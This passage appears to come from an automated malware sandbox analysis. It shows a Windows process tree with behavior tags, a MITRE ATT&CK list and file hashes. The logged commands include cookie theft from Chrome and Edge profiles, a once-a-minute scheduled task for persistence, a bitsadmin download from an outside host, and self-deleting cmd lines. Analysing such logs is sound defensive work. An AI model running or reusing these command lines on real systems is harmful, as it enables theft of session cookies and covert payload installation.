C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"3⤵
- Executes dropped EXE
PID:5712 -
C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"4⤵PID:4228
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵PID:6296
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:5144
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"5⤵PID:4352
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffad16b4f50,0x7ffad16b4f60,0x7ffad16b4f706⤵PID:6588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1832 /prefetch:26⤵PID:5280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1892 /prefetch:86⤵PID:5040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1880 /prefetch:86⤵PID:6344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2564 /prefetch:16⤵PID:3344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:16⤵PID:4276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:16⤵PID:5388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:16⤵PID:4056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:16⤵PID:3696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:16⤵PID:4968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:86⤵PID:1308
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 4228 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"5⤵PID:5112
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 42286⤵
- Kills process with taskkill
PID:6100
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 4228 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"5⤵PID:360
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 42286⤵
- Kills process with taskkill
PID:5856
-
-
-
-
-
C:\Users\Admin\Documents\B5Zne25cheXMr5C6pGJaqOCd.exe"C:\Users\Admin\Documents\B5Zne25cheXMr5C6pGJaqOCd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5700
-
-
C:\Users\Admin\Documents\fv6XVc_uoD3O9arHr5yy9k2k.exe"C:\Users\Admin\Documents\fv6XVc_uoD3O9arHr5yy9k2k.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5688
-
-
C:\Users\Admin\Documents\v_6wCPhLcl2V_gdq2coOqIvq.exe"C:\Users\Admin\Documents\v_6wCPhLcl2V_gdq2coOqIvq.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5676 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4804
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6456
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6984
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5676 -s 15284⤵
- Program crash
PID:5356
-
-
-
C:\Users\Admin\Documents\x2BFjy8SRtdIV0VKlMSL7WDQ.exe"C:\Users\Admin\Documents\x2BFjy8SRtdIV0VKlMSL7WDQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5776 -
C:\Users\Admin\Documents\x2BFjy8SRtdIV0VKlMSL7WDQ.exe"C:\Users\Admin\Documents\x2BFjy8SRtdIV0VKlMSL7WDQ.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4504
-
-
-
C:\Users\Admin\Documents\WdlRWF3gZ0pgsPt7bgSF6z9A.exe"C:\Users\Admin\Documents\WdlRWF3gZ0pgsPt7bgSF6z9A.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5784 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 7644⤵
- Program crash
PID:5796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 7804⤵
- Program crash
PID:1680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 7644⤵
- Program crash
PID:4320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 8204⤵
- Program crash
PID:5128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 9524⤵
- Program crash
PID:5208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 9804⤵
- Program crash
PID:1060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 9964⤵
- Program crash
PID:5228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 10564⤵
- Program crash
PID:4620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 14444⤵
- Program crash
PID:3788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 15404⤵
- Executes dropped EXE
- Program crash
- Suspicious use of SetWindowsHookEx
PID:4708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 15804⤵
- Program crash
PID:1564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 15684⤵
- Program crash
PID:5444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 18004⤵
- Program crash
PID:6532
-
-
-
C:\Users\Admin\Documents\hKY8VniYB7kDoypSrH3gf9gF.exe"C:\Users\Admin\Documents\hKY8VniYB7kDoypSrH3gf9gF.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6028
-
-
C:\Users\Admin\Documents\dXBNAKqK98ZCDCS5MKKJLYPr.exe"C:\Users\Admin\Documents\dXBNAKqK98ZCDCS5MKKJLYPr.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:6020 -
C:\Users\Admin\Documents\dXBNAKqK98ZCDCS5MKKJLYPr.exe"C:\Users\Admin\Documents\dXBNAKqK98ZCDCS5MKKJLYPr.exe"4⤵
- Executes dropped EXE
PID:5236
-
-
-
C:\Users\Admin\Documents\ObvJhkjc1_yeOR8FBjF3Ixme.exe"C:\Users\Admin\Documents\ObvJhkjc1_yeOR8FBjF3Ixme.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5968 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:420 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6284
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵PID:6320
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6672
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵PID:6716
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵PID:6696
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5924
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
PID:5332
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4764
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
PID:3880 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5560
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:2164
-
-
-
-
C:\Users\Admin\Documents\M5Tsem7UcRf8K_HdP1mKYE4H.exe"C:\Users\Admin\Documents\M5Tsem7UcRf8K_HdP1mKYE4H.exe"3⤵
- Executes dropped EXE
PID:5976 -
C:\Users\Admin\AppData\Local\Temp\Db4kZi5Qic.exe"C:\Users\Admin\AppData\Local\Temp\Db4kZi5Qic.exe"4⤵PID:6824
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"5⤵
- Creates scheduled task(s)
PID:6320
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\M5Tsem7UcRf8K_HdP1mKYE4H.exe"4⤵PID:6844
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:7040
-
-
-
-
C:\Users\Admin\Documents\7_LIYre9By4t8bLSgXZIvWBB.exe"C:\Users\Admin\Documents\7_LIYre9By4t8bLSgXZIvWBB.exe"3⤵
- Executes dropped EXE
PID:5900 -
C:\Users\Admin\AppData\Roaming\8605518.exe"C:\Users\Admin\AppData\Roaming\8605518.exe"4⤵
- Executes dropped EXE
PID:6136 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6136 -s 19325⤵
- Program crash
PID:5244
-
-
-
C:\Users\Admin\AppData\Roaming\4261173.exe"C:\Users\Admin\AppData\Roaming\4261173.exe"4⤵
- Executes dropped EXE
PID:5032
-
-
-
C:\Users\Admin\Documents\LC5HvfJPsti5E1qR_lCFWUiq.exe"C:\Users\Admin\Documents\LC5HvfJPsti5E1qR_lCFWUiq.exe"3⤵
- Executes dropped EXE
PID:6080 -
C:\Users\Admin\Documents\LC5HvfJPsti5E1qR_lCFWUiq.exe"C:\Users\Admin\Documents\LC5HvfJPsti5E1qR_lCFWUiq.exe"4⤵PID:3036
-
-
-
C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe"C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3584 -
C:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exeC:\Users\Admin\Documents\QBwrEA4oHDK2kN65RvpTOsS5.exe4⤵
- Executes dropped EXE
PID:5156
-
-
-
C:\Users\Admin\Documents\N5awg6WF21NeZ4xqPl67lJoP.exe"C:\Users\Admin\Documents\N5awg6WF21NeZ4xqPl67lJoP.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3940
-
-
C:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exe"C:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5044 -
C:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exeC:\Users\Admin\Documents\gGSI2_kSnGceMRNFFgKWX28N.exe4⤵PID:5332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 245⤵
- Program crash
PID:6036
-
-
-
-
C:\Users\Admin\Documents\AcakfVHVK3ZpOKofv4SFb_LD.exe"C:\Users\Admin\Documents\AcakfVHVK3ZpOKofv4SFb_LD.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"4⤵PID:5768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"4⤵PID:6456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"4⤵PID:6152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"4⤵PID:1776
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"4⤵PID:4004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"4⤵PID:3884
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nskF4BE.tmp\tempfile.ps1"4⤵PID:4492
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z4⤵
- Download via BitsAdmin
PID:6496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵PID:6520
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub2.exe"2⤵PID:6772
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\mysetold.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\mysetold.exe"2⤵PID:6636
-
C:\Users\Public\run.exeC:\Users\Public\run.exe3⤵PID:6796
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"4⤵PID:5596
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:5744
-
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe3⤵PID:5332
-
C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"4⤵PID:7144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files.exe"2⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:5844
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:6288
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4660
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5160
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1108
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3828
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4340
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4492
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:4872
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4488
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6100
-
C:\Users\Admin\AppData\Local\Temp\1E29.exeC:\Users\Admin\AppData\Local\Temp\1E29.exe1⤵PID:7116
-
C:\Users\Admin\AppData\Local\Temp\2E08.exeC:\Users\Admin\AppData\Local\Temp\2E08.exe1⤵PID:1660
-
C:\Users\Admin\AppData\Local\Temp\550A.exeC:\Users\Admin\AppData\Local\Temp\550A.exe1⤵PID:2940
-
C:\Users\Admin\AppData\Local\Temp\5EA0.exeC:\Users\Admin\AppData\Local\Temp\5EA0.exe1⤵PID:4772
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6368
-
C:\Users\Admin\AppData\Local\Temp\70C1.exeC:\Users\Admin\AppData\Local\Temp\70C1.exe1⤵PID:3788
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3064
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2472
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2628
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6984
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4516
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4568
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7156
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5596
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
MD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
MD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
MD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
MD5
